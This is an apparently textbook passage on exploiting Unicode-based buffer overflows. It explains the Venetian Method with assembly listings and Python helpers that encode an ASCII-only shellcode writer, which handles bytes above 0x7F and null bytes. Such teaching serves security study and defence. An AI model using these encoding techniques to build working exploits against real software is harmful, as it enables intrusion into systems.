Exploiting Unicode-Based Vulnerabilities

To exploit a Unicode-based buffer overflow, we first need a mechanism to transfer the process's path of execution to the user-supplied buffer. By the very nature of the vulnerability, an exploit will overwrite the saved return address or the exception handler with a Unicode value. For example, if our buffer can be found at address 0x00310004, then we'd overwrite the saved return address/exception handler with 0x00310004. If one of the registers contains the address of the user-supplied buffer (and if you're very lucky), you may be able to find a "jmp register" or "call register" opcode at or near a Unicode-style address. For example, if the EBX register points to the user-supplied buffer, then you may find a jmp ebx instruction, perhaps at address 0x00770058. If you have even more luck, you may also get away with a jmp ebx or call ebx instruction that sits a few instructions past a Unicode-form address. Consider the following code:

0x007700FF     inc ecx
0x00770100     push ecx
0x00770101     call ebx

We'd overwrite the saved return address/exception handler with 0x007700FF, and execution would transfer to this address. When execution picks up at this point, the ECX register is incremented by 1 and pushed onto the stack, and then the address held in EBX is called. Execution then continues in the user-supplied buffer. This is a one-in-a-million likelihood, but it's worth bearing in mind. If nothing in the code will cause an access violation before the call/jmp register instruction, then it's definitely usable.
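The idea of a "Unicode-style address" can be made concrete with a small check. The Python sketch below is an illustration only: the helper name is ours, and it assumes the overwritten value comes from two wide characters on a little-endian machine, so the address must have the form 0x00nn00nn with both nn bytes non-null.

```python
def is_unicode_style_address(addr: int) -> bool:
    """Return True if a 32-bit address has the form 0x00nn00nn (nn != 0)."""
    b = addr.to_bytes(4, "little")  # byte order as the value sits in memory
    return b[0] != 0 and b[1] == 0 and b[2] != 0 and b[3] == 0


# Addresses taken from the text; 0x00770101 (the call ebx itself) does not qualify.
for candidate in (0x00310004, 0x00770058, 0x007700FF, 0x00770101):
    print(hex(candidate), is_unicode_style_address(candidate))
```

This is why the overwrite in the example targets 0x007700FF rather than the address of the call ebx instruction itself.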

Assuming you do find a way to return to the user-supplied buffer, the next thing you need is either a register that contains the address of somewhere in the buffer, or an address known in advance. The Venetian Method uses this address when it creates the shellcode on the fly. We'll discuss later how to get a fix on the address of the buffer.

The Available Instruction Set in Unicode Exploits

When exploiting a Unicode-based vulnerability, the arbitrary code executed must be of a form in which every second byte is a null and the others are non-null. This obviously makes for a limited set of instructions available to you. The instructions available to the Unicode exploit developer include all single-byte operations, such as push, pop, inc, and dec. Also available are the instructions with a byte form of

nn00nn

such as:

imul eax, dword ptr[eax],0x00nn

Alternatively, you may find

nn00nn00nn

such as:

imul eax, dword ptr[eax],0x00nn00nn

Or, you could find many add-based instructions of the form

00nn00

Suppose two single-byte instructions are to be used one after the other, as in this code fragment:

00401066 50                   push        eax
00401067 59                   pop         ecx

The instructions must be separated with a nop-equivalent of the form 00 nn 00 to make the sequence Unicode in nature. One such choice could be:

00401067 00 6D 00             add         byte ptr [ebp],ch

Of course, for this method to succeed, the address pointed to by EBP must be writable. If it isn't, choose another nop-equivalent; we've listed many more later in this section. When embedded between the push and the pop we get:

00401066 50                   push        eax
00401067 00 6D 00             add         byte ptr [ebp],ch
0040106A 59                   pop         ecx

The resulting bytes are Unicode in nature:

\x50\x00\x6D\x00\x59
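The padding rule can be checked mechanically. The following Python sketch is an illustration under our own naming (none of these helpers come from a library): it joins single-byte opcodes with the 00 6D 00 nop-equivalent and tests whether the result has non-null bytes at even offsets and nulls at odd offsets.

```python
NOP_EQUIV = bytes([0x00, 0x6D, 0x00])  # add byte ptr [ebp],ch


def is_unicode_in_nature(code: bytes) -> bool:
    """True if even offsets are non-null and odd offsets are null."""
    return all((b != 0) if i % 2 == 0 else (b == 0) for i, b in enumerate(code))


def pad_single_byte_ops(ops: bytes) -> bytes:
    """Place the nop-equivalent between consecutive single-byte opcodes."""
    return NOP_EQUIV.join(bytes([op]) for op in ops)


padded = pad_single_byte_ops(bytes([0x50, 0x59]))  # push eax ; pop ecx
print(padded.hex(), is_unicode_in_nature(padded))
```

The sketch only handles single-byte opcodes; multi-byte instructions such as the imul forms above already carry their own null bytes and need to be placed by hand.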

The Venetian Method

Writing a full-featured exploit using such a limited instruction set is extremely difficult, to say the least. So what can be done to make the task easier? Well, you could use the limited set of available instructions to create the real exploit code on the fly, as is done using the Venetian technique described in Chris Anley's paper. This method essentially entails an exploit that uses an "exploit writer" and a buffer with half the real exploit already in it. This buffer is the destination that the real exploit code will eventually reach. The exploit writer, written using only the limited instruction set, replaces each null byte in the destination buffer with what it should be in order to create the full-featured real exploit code.

Let's look at an example. Before the exploit writer begins executing, the destination buffer could be:

\x41\x00\x43\x00\x45\x00\x47\x00

When the exploit writer starts, it replaces the first null with 0x42 to give us

\x41\x42\x43\x00\x45\x00\x47\x00

The next null is replaced with 0x44, which results in

\x41\x42\x43\x44\x45\x00\x47\x00

The process is repeated until the final full-featured "real" exploit remains.

\x41\x42\x43\x44\x45\x46\x47\x48

As you can see, it's much like Venetian blinds closing, hence the name for the technique.
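The closing of the blinds can be modelled in a few lines of Python. This is a sketch of the effect on the destination buffer only, not of the exploit writer's machine code; the function name and the snapshot list are our own additions for illustration.

```python
def close_blinds(dest: bytearray, fill: bytes) -> list:
    """Add each fill byte to successive null slots (odd offsets) of dest.

    Returns a snapshot of the buffer after every write.
    """
    snapshots = []
    pos = 1  # offset of the first null byte
    for value in fill:
        dest[pos] = (dest[pos] + value) & 0xFF  # add, as the writer does
        snapshots.append(bytes(dest))
        pos += 2  # skip the non-null byte that is already in place
    return snapshots


dest = bytearray(b"\x41\x00\x43\x00\x45\x00\x47\x00")
for snap in close_blinds(dest, b"\x42\x44\x46\x48"):
    print(snap.hex())
```

Each printed line corresponds to one of the intermediate buffers shown above.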

To set each null byte to its appropriate value, the exploit writer needs at least one register that points to the first null byte of the half-filled buffer when it starts its work. Assuming EAX points to the first null byte, it can be set with the following instruction:

00401066 80 00 42             add         byte ptr [eax],42h

Adding 0x42 to 0x00, needless to say, gives us 0x42. EAX then must be incremented twice to point to the next null byte; then it too can be filled. But remember, the exploit writer part of the exploit code needs to be Unicode in nature, so it should be padded with nop-equivalents. To write 1 byte of exploit code now requires the following code:

00401066 80 00 42             add         byte ptr [eax],42h
00401069 00 6D 00             add         byte ptr [ebp],ch
0040106C 40                   inc         eax
0040106D 00 6D 00             add         byte ptr [ebp],ch
00401070 40                   inc         eax
00401071 00 6D 00             add         byte ptr [ebp],ch

This is 14 bytes (7 wide characters) of instruction and 2 bytes (1 wide character) of storage, which makes 16 bytes (8 wide characters) for 2 bytes of real exploit code. One byte is already in the destination buffer; the other is created by the exploit writer on the fly.
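The byte count can be confirmed by assembling the sequence by hand. The Python sketch below simply concatenates the opcode bytes from the listing; the function name is hypothetical and the code is a size check, not a working exploit writer.

```python
NOP_EQUIV = bytes([0x00, 0x6D, 0x00])  # add byte ptr [ebp],ch


def venetian_write_byte(value: int) -> bytes:
    """Encode the add / inc / inc sequence from the listing for one null byte."""
    if not 1 <= value <= 0xFF:
        raise ValueError("value must be a non-zero byte")
    return (
        bytes([0x80, 0x00, value])  # add byte ptr [eax],value
        + NOP_EQUIV
        + b"\x40"                   # inc eax
        + NOP_EQUIV
        + b"\x40"                   # inc eax
        + NOP_EQUIV
    )


seq = venetian_write_byte(0x42)
storage = 2  # one wide character in the destination buffer
print(len(seq), len(seq) + storage)
```

Every odd offset of the sequence is a null, so the writer itself passes through the Unicode conversion intact, provided the 0x80 byte does.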

Although Chris's code is small (relatively speaking), which is a benefit, the problem is that one of the bytes of code has a value of 0x80. If the exploit is first sent as an ASCII-based string and then converted to Unicode by the vulnerable process, this byte may get mangled, depending on the code page in use during the conversion routine. In addition, when replacing a null byte with a value greater than 0x7F, the same problem creeps in: the exploit code may get mangled and thus fail to work. To solve this, we need to create an exploit writer that uses only characters 0x20 to 0x7F. An even better solution would be to use only letters and numbers; punctuation characters sometimes get special treatment and are often stripped, escaped, or converted. We will try our best to avoid these characters to guarantee success.
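The mangling is easy to reproduce. The Python sketch below uses Python's own cp1252 codec as a stand-in for the vulnerable process's conversion routine; that choice of code page, and the helper names, are assumptions made for illustration, and a real target may use a different code page with different results.

```python
def widen(data: bytes, codepage: str = "cp1252") -> bytes:
    """Decode with an ANSI code page, then re-encode as UTF-16LE."""
    return data.decode(codepage).encode("utf-16-le")


def survives(value: int, codepage: str = "cp1252") -> bool:
    """True if the byte widens to itself followed by a null."""
    try:
        return widen(bytes([value]), codepage) == bytes([value, 0x00])
    except UnicodeDecodeError:
        return False  # the byte is undefined in this code page


print(widen(b"\x41").hex())  # 'A' widens cleanly
print(widen(b"\x80").hex())  # 0x80 becomes the euro sign, U+20AC
print(survives(0x41), survives(0x80))
```

Under this assumption 0x80 turns into the two bytes AC 20, which would corrupt the add byte ptr [eax] instruction, while every byte from 0x20 to 0x7F passes through unchanged.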

An ASCII Venetian Implementation

Our task is to develop a Unicode-type exploit that, using the Venetian Method, creates arbitrary code on the fly using only ASCII letters and numbers from the Roman alphabet (a Roman Exploit Writer, if you will). We have several methods available to us, but many are too inefficient; they use too many bytes to create a single byte of arbitrary shellcode. The method we present here adheres to our requirements and appears to use the fewest bytes for an ASCII equivalent of the original code presented with the Venetian Method. Before getting to the meat of the exploit writer, we need to set certain states. We need ECX to point to the first null byte in the destination buffer, and we need the value 0x01 on top of the stack, 0x39 in the EDX register (in DL specifically), and 0x69 in the EBX register (in BL specifically). Don't worry if you don't quite understand where these preconditions come from; all will soon become clear. With the nop-equivalents (in this case, add byte ptr [ebp],ch) removed for the sake of clarity, the setup code is as follows:

0040B55E 6A 00                push        0
0040B560 5B                   pop         ebx
0040B564 43                   inc         ebx
0040B568 53                   push        ebx
0040B56C 54                   push        esp
0040B570 58                   pop         eax
0040B574 6B 00 39             imul        eax,dword ptr [eax],39h
0040B57A 50                   push        eax
0040B57E 5A                   pop         edx
0040B582 54                   push        esp
0040B586 58                   pop         eax
0040B58A 6B 00 69             imul        eax,dword ptr [eax],69h
0040B590 50                   push        eax
0040B594 5B                   pop         ebx
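The register and stack effects of this setup listing can be traced with a small model. The Python sketch below is not an x86 emulator: it models only the handful of operations used in the listing, and the register dictionary, the helper names, and the starting ESP value are all arbitrary assumptions.

```python
def run_setup():
    """Trace the setup listing; returns the final registers and stack memory."""
    mem = {}
    reg = {"eax": 0, "ebx": 0, "edx": 0, "esp": 0x0012FF00}  # ESP is arbitrary

    def push(value):
        reg["esp"] -= 4
        mem[reg["esp"]] = value & 0xFFFFFFFF

    def pop(name):
        reg[name] = mem[reg["esp"]]
        reg["esp"] += 4

    def imul_eax_mem(imm):  # imul eax,dword ptr [eax],imm
        reg["eax"] = (mem[reg["eax"]] * imm) & 0xFFFFFFFF

    push(0); pop("ebx")            # ebx = 0
    reg["ebx"] += 1                # inc ebx
    push(reg["ebx"])               # the 1 stays on top of the stack
    push(reg["esp"]); pop("eax")   # push esp stores the pre-push ESP
    imul_eax_mem(0x39)
    push(reg["eax"]); pop("edx")   # dl = 0x39
    push(reg["esp"]); pop("eax")
    imul_eax_mem(0x69)
    push(reg["eax"]); pop("ebx")   # bl = 0x69
    return reg, mem


reg, mem = run_setup()
print(hex(reg["edx"]), hex(reg["ebx"]), mem[reg["esp"]])
```

After the run, the 1 is still on top of the modelled stack, which is what the byte-writing code relies on.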

Assuming ECX already contains the pointer to the first null byte (and we'll deal with this aspect later), the setup code starts by pushing 0x00000000 onto the top of the stack, which is then popped off into the EBX register. EBX now holds the value 0. We then increment EBX by 1 and push this onto the stack. Next, we push the address of the top of the stack onto the stack, then pop it into EAX. EAX now holds the memory address of the 1. We now multiply the 1 by 0x39 to give 0x39, and the result is stored in EAX. This is then pushed onto the stack and popped into EDX. EDX now holds the value 0x39; more important, the low 8-bit DL part of EDX contains 0x39.


We then push the address of the 1 onto the top of the stack again with the push esp instruction, and again pop it into EAX. EAX contains the memory address of the 1 again. We multiply this 1 by 0x69, leaving the result in EAX. We then push the result onto the stack and pop it into EBX. EBX/BL now contains the value 0x69. Both BL and DL will come into play later when we need to write out a byte with a value greater than 0x7F. Moving on to the code that forms the implementation of the Venetian Method, and again with the nop-equivalents removed for clarity, we have:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 41             imul        eax,dword ptr [eax],41h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 41                   inc         ecx
0040B5CC 41                   inc         ecx

Remembering that we have the value 0x00000001 at the top of the stack, we push the address of the 1 onto the stack. We then pop this into EAX, so EAX now contains the address of the 1. Using the imul operation, we multiply this 1 by the value we want to write out (in this case, 0x41). EAX now holds 0x00000041, and thus AL holds 0x41. We add this to the byte pointed to by ECX. Remember that this is a null byte, so when we add 0x41 to 0x00 we're left with 0x41, thus closing the first "blind." We then increment ECX twice to point to the next null byte, skipping the non-null byte, and repeat the process until the full code is written out.
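With the nop-equivalents put back, the sequence for one byte can be assembled and inspected. In the Python sketch below the function name is hypothetical, and the placement of the add byte ptr [ebp],ch padding (including one after the final inc ecx) is inferred from the address gaps in the listings rather than stated in the text.

```python
NOP_EQUIV = bytes([0x00, 0x6D, 0x00])  # add byte ptr [ebp],ch


def roman_write_byte(imm: int) -> bytes:
    """Encode push/pop/imul/add/inc/inc for one null byte, padding included."""
    if not 0x20 <= imm <= 0x7F:
        raise ValueError("immediate must be in the range 0x20 to 0x7F")
    return (
        b"\x54" + NOP_EQUIV          # push esp
        + b"\x58" + NOP_EQUIV        # pop eax
        + bytes([0x6B, 0x00, imm])   # imul eax,dword ptr [eax],imm
        + bytes([0x00, 0x41, 0x00])  # add byte ptr [ecx],al
        + b"\x41" + NOP_EQUIV        # inc ecx
        + b"\x41" + NOP_EQUIV        # inc ecx
    )


seq = roman_write_byte(0x41)
ascii_form = seq[0::2].decode("ascii")  # what is sent before widening
print(len(seq), ascii_form)
```

For the 0x41 case the pre-conversion string consists only of letters, which is the property the Roman Exploit Writer is after.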

Now what happens if you need to write out a byte with a value greater than 0x7F? Well, this is where BL and DL come into play. What follows are a few variations on the above code that deal with this situation.

Assuming the null byte in question should be replaced with a byte in the range of 0x7F to 0xAF, for example 0x94 (xchg eax,esp), we would use the following code:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 5B             imul        eax,dword ptr [eax],5Bh
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi
0040B5C9 00 51 00             add         byte ptr [ecx],dl // <---- DL == 0x39
0040B5CC 41                   inc         ecx
0040B5D0 41                   inc         ecx

Notice what is going on here. We first write out the value 0x5B to the null byte and then add the value in DL (0x39) to it. 0x39 plus 0x5B is 0x94. Incidentally, the two add instructions need a single-byte instruction between them to keep the code Unicode in nature; we insert an INC ESI rather than an INC ECX to avoid incrementing ECX too early and adding 0x39 to one of the non-null bytes.

If the null byte to be replaced should have a value in the range of 0xAF to 0xFF, for example, 0xC3 (ret), use the following code:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 5A             imul        eax,dword ptr [eax],5Ah
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi
0040B5C9 00 59 00             add         byte ptr [ecx],bl // <---- BL == 0x69
0040B5CC 41                   inc         ecx
0040B5D0 41                   inc         ecx

In this case, we're doing the same thing, this time using BL to add 0x69 to the byte pointed to by ECX, which has just been set to 0x5A. 0x5A plus 0x69 equals 0xC3, and thus we have written out our ret instruction.

What if we need a value in the range of 0x00 to 0x20? In this case, we simply overflow the byte. Assuming we want the null byte replaced with 0x06 (push es), we'd use this code:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 64             imul        eax,dword ptr [eax],64h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi 
0040B5C9 00 59 00             add         byte ptr [ecx],bl       // <--- BL == 0x69
0040B5CC 46                   inc         esi
0040B5CD 00 51 00             add         byte ptr [ecx],dl       // <--- DL == 0x39
0040B5D0 41                   inc         ecx
0040B5D4 41                   inc         ecx

0x64 plus 0x69 plus 0x39 equals 0x106. But a byte can only hold a maximum value of 0xFF, and so the byte "overflows," leaving 0x06.
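The choice of immediate and of the BL and DL adjustments can be automated. The Python sketch below is one possible selection strategy, not the authors' tool: it prefers a letter or digit for the imul immediate and falls back to the wider 0x20 to 0x7E range when none fits. The fallback is needed even for the 0x94 example above, whose immediate 0x5B is the '[' character. The function name and the search order are our own.

```python
import string

BL, DL = 0x69, 0x39  # values the setup code leaves in BL and DL
ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))
PRINTABLE = set(range(0x20, 0x7F))  # 0x20 through 0x7E


def plan_byte(target: int):
    """Return (imm, add_bl, add_dl) such that
    imm + 0x69*add_bl + 0x39*add_dl == target (mod 256)."""
    combos = ((False, False), (False, True), (True, False), (True, True))
    for allowed in (ALNUM, PRINTABLE):  # prefer letters and digits
        for add_bl, add_dl in combos:
            imm = (target - BL * add_bl - DL * add_dl) & 0xFF
            if imm in allowed:
                return imm, add_bl, add_dl
    raise ValueError(f"no encoding found for {target:#04x}")


for target in (0x41, 0x94, 0xC3, 0x06):
    imm, add_bl, add_dl = plan_byte(target)
    print(f"{target:#04x}: imm={imm:#04x} bl={add_bl} dl={add_dl}")
```

For the four bytes used as examples in this section, the plan matches the immediates and adjustments in the listings, and the modular arithmetic covers the overflow case without special handling.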

This method can also be used to adjust non-null bytes if they're not in the range 0x20 to 0x7F. What's more, we can be efficient and replace one of the nop-equivalents with an instruction that does useful work. Assuming, for example, that the non-null byte should be 0xC3 (ret), initially we would set it to 0x5A. We then adjust it while setting the null byte that precedes it: after the first inc ecx, ECX points to this non-null byte, so the adjustment must come before the second inc ecx. We could adjust it as follows:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 41             imul        eax,dword ptr [eax],41h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 41                   inc         ecx                   // <-- ECX now points to the 0x5A in the destination buffer
0040B5C9 00 59 00             add         byte ptr [ecx],bl     // <-- BL == 0x69; the non-null byte now equals 0xC3
0040B5CC 41                   inc         ecx
0040B5CD 00 6D 00             add         byte ptr [ebp],ch

We repeat these actions until our code is complete. We're left then with the question: What code do we really want to execute?